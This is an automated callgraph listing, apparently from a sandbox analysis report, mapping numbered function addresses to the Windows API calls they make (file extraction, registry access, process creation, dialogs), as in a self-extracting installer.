2421 3224a9 FindNextFileA 2418->2421 2419 322479 2422 322488 SetFileAttributesA DeleteFileA 2419->2422 2420->2421 2420->2425 2423 3224bd FindClose RemoveDirectoryA 2421->2423 2421->2425 2422->2421 2423->2413 2424 32658a CharPrevA 2424->2425 2425->2418 2425->2419 2425->2421 2425->2424 2426 322390 5 API calls 2425->2426 2426->2425 2432 323737 2427->2432 2434 32372d 2427->2434 2428 3244b9 20 API calls 2429 3239fc 2428->2429 2430 326ce0 4 API calls 2429->2430 2431 322e92 2430->2431 2431->2244 2431->2264 2442 3218a3 2431->2442 2432->2429 2432->2434 2435 3238a4 2432->2435 2514 3228e8 2432->2514 2434->2428 2434->2429 2435->2429 2435->2434 2436 3239c1 MessageBeep 2435->2436 2437 32681f 10 API calls 2436->2437 2438 3239ce 2437->2438 2439 3239d8 MessageBoxA 2438->2439 2441 3267c9 EnumResourceLanguagesA 2438->2441 2439->2429 2441->2439 2443 3218d5 2442->2443 2449 3219b8 2442->2449 2543 3217ee LoadLibraryA 2443->2543 2445 326ce0 4 API calls 2447 3219d5 2445->2447 2447->2264 2462 326517 FindResourceA 2447->2462 2448 3218e5 GetCurrentProcess OpenProcessToken 2448->2449 2450 321900 GetTokenInformation 2448->2450 2449->2445 2451 3219aa CloseHandle 2450->2451 2452 321918 GetLastError 2450->2452 2451->2449 2452->2451 2453 321927 LocalAlloc 2452->2453 2454 321938 GetTokenInformation 2453->2454 2455 3219a9 2453->2455 2456 3219a2 LocalFree 2454->2456 2457 32194e AllocateAndInitializeSid 2454->2457 2455->2451 2456->2455 2457->2456 2458 32196e 2457->2458 2459 321999 FreeSid 2458->2459 2460 321975 EqualSid 2458->2460 2461 32198c 2458->2461 2459->2456 2460->2458 2460->2461 2461->2459 2463 326536 LoadResource 2462->2463 2464 32656b 2462->2464 2463->2464 2466 326544 DialogBoxIndirectParamA FreeResource 2463->2466 2465 3244b9 20 API calls 2464->2465 2467 32657c 2465->2467 2466->2464 2466->2467 2467->2264 2469->2356 2471 326940 2470->2471 2472 326857 GetVersionExA 2470->2472 2473 326ce0 4 API calls 2471->2473 2474 32687c 2472->2474 2481 32691a 2472->2481 2475 32463b 2473->2475 2476 3268a5 GetSystemMetrics 2474->2476 2474->2481 2475->2383 2475->2384 2477 3268b5 RegOpenKeyExA 2476->2477 2476->2481 2478 3268d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 32690c 2478->2479 2478->2481 2492 3266f9 2479->2492 2481->2471 2483 3267e2 2482->2483 2486 326803 2482->2486 2496 326793 EnumResourceLanguagesA 2483->2496 2485 3267f5 2485->2486 2497 326793 EnumResourceLanguagesA 2485->2497 2486->2372 2489 32172d 2488->2489 2490 32173d _vsnprintf 2489->2490 2491 32175d 2489->2491 2490->2491 2491->2380 2493 32670f 2492->2493 2494 326740 CharNextA 2493->2494 2495 32674b 2493->2495 2494->2493 2495->2481 2496->2485 2497->2486 2501 3266d5 2498->2501 2499 3266f3 2499->2393 2501->2499 2502 3266e5 CharNextA 2501->2502 2510 326648 2501->2510 2502->2501 2504 32659b 2503->2504 2504->2504 2505 3265b8 CharPrevA 2504->2505 2506 3265ab 2504->2506 2505->2506 2506->2410 2513 326cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 32621d 2511 326668 2510->2511 2512 32665d IsDBCSLeadByte 2510->2512 2511->2501 2512->2511 2513->2509 2515 322a62 2514->2515 2522 32290d 2514->2522 2516 322a75 2515->2516 2517 322a6e GlobalFree 2515->2517 2516->2435 2517->2516 2519 322955 GlobalAlloc 2519->2515 2520 322968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 322a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 322a80 GlobalUnlock 2522->2523 2524 322773 2522->2524 2523->2515 2525 3228b2 2524->2525 2526 3227a3 CharUpperA CharNextA CharNextA 2524->2526 2527 3228b7 GetSystemDirectoryA 2525->2527 2526->2527 2528 3227db 2526->2528 2530 3228bf 2527->2530 2529 3228a8 GetWindowsDirectoryA 2528->2529 2531 3227e3 2528->2531 2529->2530 2532 3228d2 2530->2532 2533 32658a CharPrevA 2530->2533 2535 32658a CharPrevA 2531->2535 2534 326ce0 4 API calls 2532->2534 2533->2532 2536 3228e2 2534->2536 2537 322810 RegOpenKeyExA 2535->2537 2536->2522 2537->2530 2538 322837 RegQueryValueExA 2537->2538 2539 32289a RegCloseKey 2538->2539 2540 32285c 2538->2540 2539->2530 2541 322867 ExpandEnvironmentStringsA 2540->2541 2542 32287a 2540->2542 2541->2542 2542->2539 2544 321890 2543->2544 2545 321826 GetProcAddress 2543->2545 2546 326ce0 4 API calls 2544->2546 2547 321889 FreeLibrary 2545->2547 2548 321839 AllocateAndInitializeSid 2545->2548 2549 32189f 2546->2549 2547->2544 2548->2547 2550 32185f FreeSid 2548->2550 2549->2448 2549->2449 2550->2547 2553 32468f 7 API calls 2552->2553 2554 3251f9 LocalAlloc 2553->2554 2555 32522d 2554->2555 2556 32520d 2554->2556 2557 32468f 7 API calls 2555->2557 2558 3244b9 20 API calls 2556->2558 2559 32523a 2557->2559 2560 32521e 2558->2560 2561 325262 lstrcmpA 2559->2561 2562 32523e 2559->2562 2563 326285 GetLastError 2560->2563 2565 325272 LocalFree 2561->2565 2566 32527e 2561->2566 2564 3244b9 20 API calls 2562->2564 2568 322f4d 2563->2568 2567 32524f LocalFree 2564->2567 2565->2568 2569 3244b9 20 API calls 2566->2569 2567->2568 2568->2279 2568->2281 2568->2313 2570 325290 LocalFree 2569->2570 2570->2568 2572 32468f 7 API calls 2571->2572 2573 325175 2572->2573 2574 32517a 2573->2574 2575 3251af 2573->2575 2576 3244b9 20 API calls 2574->2576 2577 32468f 7 API calls 2575->2577 2578 32518d 2576->2578 2579 3251c0 2577->2579 2578->2283 2733 326298 2579->2733 2582 3251e1 2582->2283 2583 3244b9 20 API calls 2583->2578 2585 32468f 7 API calls 2584->2585 2586 3255c7 LocalAlloc 2585->2586 2587 3255db 2586->2587 2588 3255fd 2586->2588 2589 3244b9 20 API calls 2587->2589 2590 32468f 7 API calls 2588->2590 2591 3255ec 2589->2591 2592 32560a 2590->2592 2593 326285 GetLastError 2591->2593 2594 325632 lstrcmpA 2592->2594 2595 32560e 2592->2595 2618 3255f1 2593->2618 2597 325645 2594->2597 2598 32564b LocalFree 2594->2598 2596 3244b9 20 API calls 2595->2596 2601 32561f LocalFree 2596->2601 2597->2598 2599 325696 2598->2599 2600 32565b 2598->2600 2602 32589f 2599->2602 2605 3256ae GetTempPathA 2599->2605 2606 325467 49 API calls 2600->2606 2601->2618 2603 326517 24 API calls 2602->2603 2603->2618 2604 326ce0 4 API calls 2607 322f7e 2604->2607 2608 3256eb 2605->2608 2609 3256c3 2605->2609 2610 325678 2606->2610 2607->2290 2607->2313 2614 325717 GetDriveTypeA 2608->2614 2615 32586c GetWindowsDirectoryA 2608->2615 2608->2618 2745 325467 2609->2745 2613 3244b9 20 API calls 2610->2613 2610->2618 2613->2618 2619 325730 GetFileAttributesA 2614->2619 2630 32572b 2614->2630 2779 32597d GetCurrentDirectoryA SetCurrentDirectoryA 2615->2779 2618->2604 2619->2630 2621 325467 49 API calls 2621->2608 2622 322630 21 API calls 2622->2630 2624 3257c1 GetWindowsDirectoryA 2624->2630 2625 32658a CharPrevA 2627 3257e8 GetFileAttributesA 2625->2627 2626 32597d 34 API calls 2626->2630 2628 3257fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 325827 SetFileAttributesA 2629->2630 2630->2614 2630->2615 2630->2618 2630->2619 2630->2622 2630->2624 2630->2625 2630->2626 2630->2629 2631 325467 49 API calls 2630->2631 2775 326952 2630->2775 2631->2630 2633 326268 2632->2633 2634 326249 2632->2634 2635 32597d 34 API calls 2633->2635 2636 3244b9 20 API calls 2634->2636 2637 32625f 2635->2637 2638 32625a 2636->2638 2640 326ce0 4 API calls 2637->2640 2639 326285 GetLastError 2638->2639 2639->2637 2641 323013 2640->2641 2641->2297 2641->2313 2643 323b2d 2642->2643 2643->2643 2644 323b72 2643->2644 2645 323b53 2643->2645 2845 324fe0 2644->2845 2647 326517 24 API calls 2645->2647 2648 323b70 2647->2648 2649 326298 10 API calls 2648->2649 2650 323b7b 2648->2650 2649->2650 2650->2300 2652 322622 2651->2652 2653 322583 2651->2653 2896 3224e0 GetWindowsDirectoryA 2652->2896 2654 3225e8 RegOpenKeyExA 2653->2654 2656 32258b 2653->2656 2657 3225e3 2654->2657 2658 322609 RegQueryInfoKeyA 2654->2658 2656->2657 2659 32259b RegOpenKeyExA 2656->2659 2657->2306 2660 3225d1 RegCloseKey 2658->2660 2659->2657 2661 3225bc RegQueryValueExA 2659->2661 2660->2657 2661->2660 2663 323bdb 2662->2663 2664 323bec 2662->2664 2665 32468f 7 API calls 2663->2665 2666 323c03 memset 2664->2666 2667 323d13 2664->2667 2669 323d26 2664->2669 2673 323fd7 2664->2673 2674 323d7b CompareStringA 2664->2674 2675 323fab 2664->2675 2679 32468f 7 API calls 2664->2679 2680 323f46 LocalFree 2664->2680 2681 323f1e LocalFree 2664->2681 2685 323cc7 CompareStringA 2664->2685 2696 323e10 2664->2696 2904 321ae8 2664->2904 2945 32202a memset memset RegCreateKeyExA 2664->2945 2971 323fef 2664->2971 2665->2664 2666->2664 2668 3244b9 20 API calls 2667->2668 2668->2669 2671 326ce0 4 API calls 2669->2671 2672 323f60 2671->2672 2672->2311 2673->2669 2995 322267 2673->2995 2674->2664 2674->2673 2678 3244b9 20 API calls 2675->2678 2683 323fbe LocalFree 2678->2683 2679->2664 2680->2669 2681->2664 2681->2673 2683->2669 2685->2664 2686 323f92 2689 3244b9 20 API calls 2686->2689 2687 323e1f GetProcAddress 2688 323f64 2687->2688 2687->2696 2690 3244b9 20 API calls 2688->2690 2691 323fa9 2689->2691 2692 323f75 FreeLibrary 2690->2692 2693 323f7c LocalFree 2691->2693 2692->2693 2694 326285 GetLastError 2693->2694 2695 323f8b 2694->2695 2695->2669 2696->2686 2696->2687 2697 323f40 FreeLibrary 2696->2697 2698 323eff FreeLibrary 2696->2698 2985 326495 2696->2985 2697->2680 2698->2681 2700 32468f 7 API calls 2699->2700 2701 323a55 LocalAlloc 2700->2701 2702 323a8e 2701->2702 2703 323a6c 2701->2703 2705 32468f 7 API calls 2702->2705 2704 3244b9 20 API calls 2703->2704 2706 323a7d 2704->2706 2707 323a98 2705->2707 2708 326285 GetLastError 2706->2708 2709 323ac5 lstrcmpA 2707->2709 2710 323a9c 2707->2710 2716 322f64 2708->2716 2712 323ada 2709->2712 2713 323b0d LocalFree 2709->2713 2711 3244b9 20 API calls 2710->2711 2714 323aad LocalFree 2711->2714 2715 326517 24 API calls 2712->2715 2713->2716 2714->2716 2717 323aec LocalFree 2715->2717 2716->2279 2716->2313 2717->2716 2719 32628f 2718->2719 2719->2313 2721 32468f 7 API calls 2720->2721 2722 32417d LocalAlloc 2721->2722 2723 324195 2722->2723 2724 3241a8 2722->2724 2725 3244b9 20 API calls 2723->2725 2726 32468f 7 API calls 2724->2726 2727 3241a6 2725->2727 2728 3241b5 2726->2728 2727->2313 2729 3241c5 lstrcmpA 2728->2729 2730 3241b9 2728->2730 2729->2730 2731 3241e6 LocalFree 2729->2731 2732 3244b9 20 API calls 2730->2732 2731->2727 2732->2731 2734 32171e _vsnprintf 2733->2734 2735 3262c9 FindResourceA 2734->2735 2737 326353 2735->2737 2738 3262cb LoadResource LockResource 2735->2738 2739 326ce0 4 API calls 2737->2739 2738->2737 2741 3262e0 2738->2741 2740 3251ca 2739->2740 2740->2582 2740->2583 2742 326355 FreeResource 2741->2742 2743 32631b FreeResource 2741->2743 2742->2737 2744 32171e _vsnprintf 2743->2744 2744->2735 2746 32548a 2745->2746 2764 32551a 2745->2764 2805 3253a1 2746->2805 2748 325581 2752 326ce0 4 API calls 2748->2752 2751 325495 2751->2748 2755 3254c2 GetSystemInfo 2751->2755 2756 32550c 2751->2756 2757 32559a 2752->2757 2753 32553b CreateDirectoryA 2758 325577 2753->2758 2759 325547 2753->2759 2754 32554d 2754->2748 2760 32597d 34 API calls 2754->2760 2768 3254da 2755->2768 2761 32658a CharPrevA 2756->2761 2757->2618 2769 322630 GetWindowsDirectoryA 2757->2769 2762 326285 GetLastError 2758->2762 2759->2754 2763 32555c 2760->2763 2761->2764 2765 32557c 2762->2765 2763->2748 2767 325568 RemoveDirectoryA 2763->2767 2816 3258c8 2764->2816 2765->2748 2766 32658a CharPrevA 2766->2756 2767->2748 2768->2756 2768->2766 2770 32265e 2769->2770 2771 32266f 2769->2771 2772 3244b9 20 API calls 2770->2772 2773 326ce0 4 API calls 2771->2773 2772->2771 2774 322687 2773->2774 2774->2608 2774->2621 2776 3269a1 2775->2776 2777 32696e GetDiskFreeSpaceA 2775->2777 2776->2630 2777->2776 2778 326989 MulDiv 2777->2778 2778->2776 2780 3259bb 2779->2780 2781 3259dd GetDiskFreeSpaceA 2779->2781 2784 3244b9 20 API calls 2780->2784 2782 325ba1 memset 2781->2782 2783 325a21 MulDiv 2781->2783 2785 326285 GetLastError 2782->2785 2783->2782 2786 325a50 GetVolumeInformationA 2783->2786 2787 3259cc 2784->2787 2789 325bbc GetLastError FormatMessageA 2785->2789 2790 325ab5 SetCurrentDirectoryA 2786->2790 2791 325a6e memset 2786->2791 2788 326285 GetLastError 2787->2788 2792 3259d1 2788->2792 2793 325be3 2789->2793 2800 325acc 2790->2800 2794 326285 GetLastError 2791->2794 2798 326ce0 4 API calls 2792->2798 2795 3244b9 20 API calls 2793->2795 2796 325a89 GetLastError FormatMessageA 2794->2796 2797 325bf5 SetCurrentDirectoryA 2795->2797 2796->2793 2797->2792 2799 325c11 2798->2799 2799->2608 2801 325b20 2800->2801 2802 325b0a 2800->2802 2801->2792 2828 32268b 2801->2828 2803 3244b9 20 API calls 2802->2803 2803->2792 2807 3253bf 2805->2807 2806 32171e _vsnprintf 2806->2807 2807->2806 2808 32658a CharPrevA 2807->2808 2811 325415 GetTempFileNameA 2807->2811 2809 3253fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 32544f CreateDirectoryA 2809->2810 2810->2811 2812 32543a 2810->2812 2811->2812 2813 325429 DeleteFileA CreateDirectoryA 2811->2813 2814 326ce0 4 API calls 2812->2814 2813->2812 2815 325449 2814->2815 2815->2751 2817 3258d8 2816->2817 2817->2817 2818 3258df LocalAlloc 2817->2818 2819 3258f3 2818->2819 2820 325919 2818->2820 2821 3244b9 20 API calls 2819->2821 2824 32658a CharPrevA 2820->2824 2822 325906 2821->2822 2823 326285 GetLastError 2822->2823 2825 325534 2822->2825 2823->2825 2826 325931 CreateFileA LocalFree 2824->2826 2825->2753 2825->2754 2826->2822 2827 32595b CloseHandle GetFileAttributesA 2826->2827 2827->2822 2829 3226e5 2828->2829 2830 3226b9 2828->2830 2832 3226ea 2829->2832 2833 32271f 2829->2833 2831 32171e _vsnprintf 2830->2831 2834 3226cc 2831->2834 2835 32171e _vsnprintf 2832->2835 2836 32171e _vsnprintf 2833->2836 2844 3226e3 2833->2844 2838 3244b9 20 API calls 2834->2838 2839 3226fd 2835->2839 2841 322735 2836->2841 2837 326ce0 4 API calls 2842 32276d 2837->2842 2838->2844 2840 3244b9 20 API calls 2839->2840 2840->2844 2843 3244b9 20 API calls 2841->2843 2842->2792 2843->2844 2844->2837 2846 32468f 7 API calls 2845->2846 2847 324ff5 FindResourceA LoadResource LockResource 2846->2847 2848 325020 2847->2848 2860 32515f 2847->2860 2849 325057 2848->2849 2850 325029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2864 324efd 2849->2864 2850->2849 2853 325060 2854 3244b9 20 API calls 2853->2854 2855 325075 2854->2855 2857 325110 FreeResource 2855->2857 2858 32511d 2855->2858 2856 3244b9 20 API calls 2856->2855 2857->2858 2859 32513a 2858->2859 2861 3244b9 20 API calls 2858->2861 2859->2860 2862 32514c SendMessageA 2859->2862 2860->2648 2861->2859 2862->2860 2863 32507c 2863->2855 2863->2856 2865 324f4a 2864->2865 2866 324fa1 2865->2866 2872 324980 2865->2872 2868 326ce0 4 API calls 2866->2868 2869 324fc6 2868->2869 2869->2853 2869->2863 2873 324990 2872->2873 2874 3249c2 lstrcmpA 2873->2874 2875 3249a5 2873->2875 2877 3249ba 2874->2877 2878 324a0e 2874->2878 2876 3244b9 20 API calls 2875->2876 2876->2877 2877->2866 2880 324b60 2877->2880 2878->2877 2883 32487a 2878->2883 2881 324b92 FindCloseChangeNotification 2880->2881 2882 324b76 2880->2882 2881->2882 2882->2866 2884 3248a2 CreateFileA 2883->2884 2886 324908 2884->2886 2887 3248e9 2884->2887 2886->2877 2887->2886 2888 3248ee 2887->2888 2891 32490c 2888->2891 2892 3248f5 CreateFileA 2891->2892 2894 324917 2891->2894 2892->2886 2893 324962 CharNextA 2893->2894 2894->2892 2894->2893 2895 324953 CreateDirectoryA 2894->2895 2895->2893 2897 322510 2896->2897 2898 32255b 2896->2898 2899 32658a CharPrevA 2897->2899 2900 326ce0 4 API calls 2898->2900 2901 322522 WritePrivateProfileStringA _lopen 2899->2901 2902 322569 2900->2902 2901->2898 2903 322548 _llseek _lclose 2901->2903 2902->2657 2903->2898 2905 321b25 2904->2905 3009 321a84 2905->3009 2907 321b57 2908 32658a CharPrevA 2907->2908 2910 321b8c 2907->2910 2908->2910 2909 3266c8 2 API calls 2911 321bd1 2909->2911 2910->2909 2912 321d73 2911->2912 2913 321bd9 CompareStringA 2911->2913 2915 3266c8 2 API calls 2912->2915 2913->2912 2914 321bf7 GetFileAttributesA 2913->2914 2916 321d53 2914->2916 2917 321c0d 2914->2917 2918 321d7d 2915->2918 2919 321d64 2916->2919 2917->2916 2924 321a84 2 API calls 2917->2924 2920 321d81 CompareStringA 2918->2920 2921 321df8 LocalAlloc 2918->2921 2922 3244b9 20 API calls 2919->2922 2920->2921 2929 321d9b 2920->2929 2921->2919 2923 321e0b GetFileAttributesA 2921->2923 2925 321d6c 2922->2925 2926 321e1d 2923->2926 2943 321e45 2923->2943 2927 321c31 2924->2927 2931 326ce0 4 API calls 2925->2931 2926->2943 2928 321c50 LocalAlloc 2927->2928 2932 321a84 2 API calls 2927->2932 2928->2919 2930 321c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2930 2929->2929 2933 321dbe LocalAlloc 2929->2933 2938 321cf8 2930->2938 2942 321cc2 2930->2942 2936 321ea1 2931->2936 2932->2928 2933->2919 2937 321de1 2933->2937 2936->2664 2941 32171e _vsnprintf 2937->2941 2939 321d23 2938->2939 2940 321d09 GetShortPathNameA 2938->2940 2944 32171e _vsnprintf 2939->2944 2940->2939 2941->2942 2942->2925 3015 322aac 2943->3015 2944->2942 2946 322256 2945->2946 2947 32209a 2945->2947 2948 326ce0 4 API calls 2946->2948 2950 32171e _vsnprintf 2947->2950 2952 3220dc 2947->2952 2949 322263 2948->2949 2949->2664 2951 3220af RegQueryValueExA 2950->2951 2951->2947 2951->2952 2953 3220e4 RegCloseKey 2952->2953 2954 3220fb GetSystemDirectoryA 2952->2954 2953->2946 2955 32658a CharPrevA 2954->2955 2956 32211b LoadLibraryA 2955->2956 2957 322179 GetModuleFileNameA 2956->2957 2958 32212e GetProcAddress FreeLibrary 2956->2958 2960 3221de RegCloseKey 2957->2960 2962 322177 LocalAlloc 2957->2962 2958->2957 2959 32214e GetSystemDirectoryA 2958->2959 2961 322165 2959->2961 2959->2962 2960->2946 2963 32658a CharPrevA 2961->2963 2965 3221ec 2962->2965 2966 3221cd 2962->2966 2963->2962 2968 32171e _vsnprintf 2965->2968 2967 3244b9 20 API calls 2966->2967 2967->2960 2969 322218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2946 2972 324016 CreateProcessA 2971->2972 2973 324106 2971->2973 2974 324041 WaitForSingleObject GetExitCodeProcess 2972->2974 2975 3240c4 2972->2975 2976 326ce0 4 API calls 2973->2976 2981 324070 2974->2981 2977 326285 GetLastError 2975->2977 2978 324117 2976->2978 2980 3240c9 GetLastError FormatMessageA 2977->2980 2978->2664 2983 3244b9 20 API calls 2980->2983 3042 32411b 2981->3042 2982 324096 CloseHandle CloseHandle 2982->2973 2984 3240ba 2982->2984 2983->2973 2984->2973 2986 3264c2 2985->2986 2987 32658a CharPrevA 2986->2987 2988 3264d8 GetFileAttributesA 2987->2988 2989 326501 LoadLibraryA 2988->2989 2990 3264ea 2988->2990 2992 326508 2989->2992 2990->2989 2991 3264ee LoadLibraryExA 2990->2991 2991->2992 2993 326ce0 4 API calls 2992->2993 2994 326513 2993->2994 2994->2696 2996 322381 2995->2996 2997 322289 RegOpenKeyExA 2995->2997 2998 326ce0 4 API calls 2996->2998 2997->2996 2999 3222b1 RegQueryValueExA 2997->2999 3002 32238c 2998->3002 3000 3222e6 memset GetSystemDirectoryA 2999->3000 3001 322374 RegCloseKey 2999->3001 3003 322321 3000->3003 3004 32230f 3000->3004 3001->2996 3002->2669 3006 32171e _vsnprintf 3003->3006 3005 32658a CharPrevA 3004->3005 3005->3003 3007 32233f RegSetValueExA 3006->3007 3007->3001 3010 321a9a 3009->3010 3012 321aba 3010->3012 3014 321aaf 3010->3014 3028 32667f 3010->3028 3012->2907 3013 32667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 322ad4 GetModuleFileNameA 3015->3016 3017 322be6 3015->3017 3027 322b02 3016->3027 3018 326ce0 4 API calls 3017->3018 3020 322bf5 3018->3020 3019 322af1 IsDBCSLeadByte 3019->3027 3020->2925 3021 322b11 CharNextA CharUpperA 3024 322b8d CharUpperA 3021->3024 3021->3027 3022 322bca CharNextA 3023 322bd3 CharNextA 3022->3023 3023->3027 3024->3027 3026 322b43 CharPrevA 3026->3027 3027->3017 3027->3019 3027->3021 3027->3022 3027->3023 3027->3026 3033 3265e8 3027->3033 3031 326689 3028->3031 3029 326648 IsDBCSLeadByte 3029->3031 3030 3266a5 3030->3010 3031->3029 3031->3030 3032 326697 CharNextA 3031->3032 3032->3031 3034 3265f4 3033->3034 3034->3034 3035 3265fb CharPrevA 3034->3035 3036 326611 CharPrevA 3035->3036 3037 32660b 3036->3037 3038 32661e 3036->3038 3037->3036 3037->3038 3039 32663d 3038->3039 3040 326627 CharPrevA 3038->3040 3041 326634 CharNextA 3038->3041 3039->3027 3040->3039 3040->3041 3041->3039 3043 324132 3042->3043 3045 32412a 3042->3045 3046 321ea7 3043->3046 3045->2982 3047 321eba 3046->3047 3048 321ed3 3046->3048 3049 32256d 15 API calls 3047->3049 3048->3045 3049->3048 3051 321ff0 RegOpenKeyExA 3050->3051 3052 322026 3050->3052 3051->3052 3053 32200f RegDeleteValueA RegCloseKey 3051->3053 3052->2319 3053->3052 3163 326a20 __getmainargs 3164 3219e0 3165 321a03 3164->3165 3166 321a24 GetDesktopWindow 3164->3166 3168 321a16 EndDialog 3165->3168 3170 321a20 3165->3170 3167 3243d0 11 API calls 3166->3167 3169 321a33 LoadStringA SetDlgItemTextA MessageBeep 3167->3169 3168->3170 3169->3170 3171 326ce0 4 API calls 3170->3171 3172 321a7e 3171->3172 3173 326bef _XcptFilter 3054 324ad0 3062 323680 3054->3062 3057 324ae9 3058 324aee WriteFile 3059 324b14 3058->3059 3060 324b0f 3058->3060 3059->3060 3061 324b3b SendDlgItemMessageA 3059->3061 3061->3060 3063 323691 MsgWaitForMultipleObjects 3062->3063 3064 3236e8 3063->3064 3065 3236a9 PeekMessageA 3063->3065 3064->3057 3064->3058 3065->3063 3068 3236bc 3065->3068 3066 3236c7 DispatchMessageA 3067 3236d1 PeekMessageA 3066->3067 3067->3068 3068->3063 3068->3064 3068->3066 3068->3067 3069 324cd0 3070 324cf4 3069->3070 3071 324d0b 3069->3071 3072 324d02 3070->3072 3073 324b60 FindCloseChangeNotification 3070->3073 3071->3072 3075 324dcb 3071->3075 3078 324d25 3071->3078 3074 326ce0 4 API calls 3072->3074 3073->3072 3076 324e95 3074->3076 3077 324dd4 SetDlgItemTextA 3075->3077 3079 324de3 3075->3079 3077->3079 3078->3072 3092 324c37 3078->3092 3079->3072 3097 32476d 3079->3097 3083 324e38 3083->3072 3085 324980 25 API calls 3083->3085 3084 324b60 FindCloseChangeNotification 3086 324d99 SetFileAttributesA 3084->3086 3087 324e56 3085->3087 3086->3072 3087->3072 3088 324e64 3087->3088 3106 3247e0 LocalAlloc 3088->3106 3091 324e6f 3091->3072 3093 324c4c DosDateTimeToFileTime 3092->3093 3094 324c88 3092->3094 3093->3094 3095 324c5e LocalFileTimeToFileTime 3093->3095 3094->3072 3094->3084 3095->3094 3096 324c70 SetFileTime 3095->3096 3096->3094 3115 3266ae GetFileAttributesA 3097->3115 3099 32477b 3099->3083 3100 3247cc SetFileAttributesA 3102 3247db 3100->3102 3102->3083 3103 326517 24 API calls 3104 3247b1 3103->3104 3104->3100 3104->3102 3105 3247c2 3104->3105 3105->3100 3107 3247f6 3106->3107 3108 32480f LocalAlloc 3106->3108 3109 3244b9 20 API calls 3107->3109 3110 32480b 3108->3110 3112 324831 3108->3112 3109->3110 3110->3091 3113 3244b9 20 API calls 3112->3113 3114 324846 LocalFree 3113->3114 3114->3110 3116 324777 3115->3116 3116->3099 3116->3100 3116->3103 3174 323210 3175 323227 3174->3175 3176 32328e EndDialog 3174->3176 3177 3233e2 GetDesktopWindow 3175->3177 3178 323235 3175->3178 3192 323239 3176->3192 3180 3243d0 11 API calls 3177->3180 3182 32324c 3178->3182 3183 3232dd GetDlgItemTextA 3178->3183 3178->3192 3181 3233f1 SetWindowTextA SendDlgItemMessageA 3180->3181 3184 32341f GetDlgItem EnableWindow 3181->3184 3181->3192 3186 323251 3182->3186 3187 3232c5 EndDialog 3182->3187 3185 323366 3183->3185 3193 3232fc 3183->3193 3184->3192 3189 3244b9 20 API calls 3185->3189 3188 32325c LoadStringA 3186->3188 3186->3192 3187->3192 3190 323294 3188->3190 3191 32327b 3188->3191 3189->3192 3212 324224 LoadLibraryA 3190->3212 3197 3244b9 20 API calls 3191->3197 3193->3185 3196 323331 GetFileAttributesA 3193->3196 3199 32333f 3196->3199 3200 32337c 3196->3200 3197->3176 3198 3232a5 SetDlgItemTextA 3198->3191 3198->3192 3202 3244b9 20 API calls 3199->3202 3201 32658a CharPrevA 3200->3201 3203 32338d 3201->3203 3204 323351 3202->3204 3205 3258c8 27 API calls 3203->3205 3204->3192 3206 32335a CreateDirectoryA 3204->3206 3207 323394 3205->3207 3206->3185 3206->3200 3207->3185 3208 3233a4 3207->3208 3209 3233c7 EndDialog 3208->3209 3210 32597d 34 API calls 3208->3210 3209->3192 3211 3233c3 3210->3211 3211->3192 3211->3209 3213 3243b2 3212->3213 3214 324246 GetProcAddress 3212->3214 3218 3244b9 20 API calls 3213->3218 3215 3243a4 FreeLibrary 3214->3215 3216 32425d GetProcAddress 3214->3216 3215->3213 3216->3215 3217 324274 GetProcAddress 3216->3217 3217->3215 3219 32428b 3217->3219 3220 32329d 3218->3220 3221 324295 GetTempPathA 3219->3221 3225 3242e1 3219->3225 3220->3192 3220->3198 3222 3242ad 3221->3222 3222->3222 3223 3242b4 CharPrevA 3222->3223 3224 3242d0 CharPrevA 3223->3224 3223->3225 3224->3225 3226 324390 FreeLibrary 3225->3226 3226->3220 3227 324a50 3228 324a9f ReadFile 3227->3228 3230 324a66 3227->3230 3231 324abb 3228->3231 3229 324a82 memcpy 3229->3231 3230->3229 3230->3231 3232 323450 3233 3234d3 EndDialog 3232->3233 3234 32345e 3232->3234 3235 32346a 3233->3235 3236 323465 3234->3236 3237 32349a GetDesktopWindow 3234->3237 3236->3235 3240 32348c EndDialog 3236->3240 3238 3243d0 11 API calls 3237->3238 3239 3234ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3238->3239 3239->3235 3240->3235 3241 326c03 3242 326c17 _exit 3241->3242 3243 326c1e 3241->3243 3242->3243 3244 326c27 _cexit 3243->3244 3245 326c32 3243->3245 3244->3245 3117 326f40 SetUnhandledExceptionFilter 3118 324cc0 GlobalFree 3246 324200 3247 32420b SendMessageA 3246->3247 3248 32421e 3246->3248 3247->3248 3249 323100 3250 3231b0 3249->3250 3251 323111 3249->3251 3252 3231b9 SendDlgItemMessageA 3250->3252 3255 323141 3250->3255 3253 323149 GetDesktopWindow 3251->3253 3256 32311d 3251->3256 3252->3255 3257 3243d0 11 API calls 3253->3257 3254 323138 EndDialog 3254->3255 3256->3254 3256->3255 3258 32315d 6 API calls 3257->3258 3258->3255 3259 324bc0 3261 324bd7 3259->3261 3262 324c05 3259->3262 3260 324c1b SetFilePointer 3260->3261 3262->3260 3262->3261 3263 3230c0 3264 3230de CallWindowProcA 3263->3264 3265 3230ce 3263->3265 3266 3230da 3264->3266 3265->3264 3265->3266 3267 3263c0 3268 326407 3267->3268 3269 32658a CharPrevA 3268->3269 3270 326415 CreateFileA 3269->3270 3271 32643a 3270->3271 3272 326448 WriteFile 3270->3272 3274 326ce0 4 API calls 3271->3274 3273 326465 CloseHandle 3272->3273 3273->3271 3276 32648f 3274->3276

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                            • Disassembly available
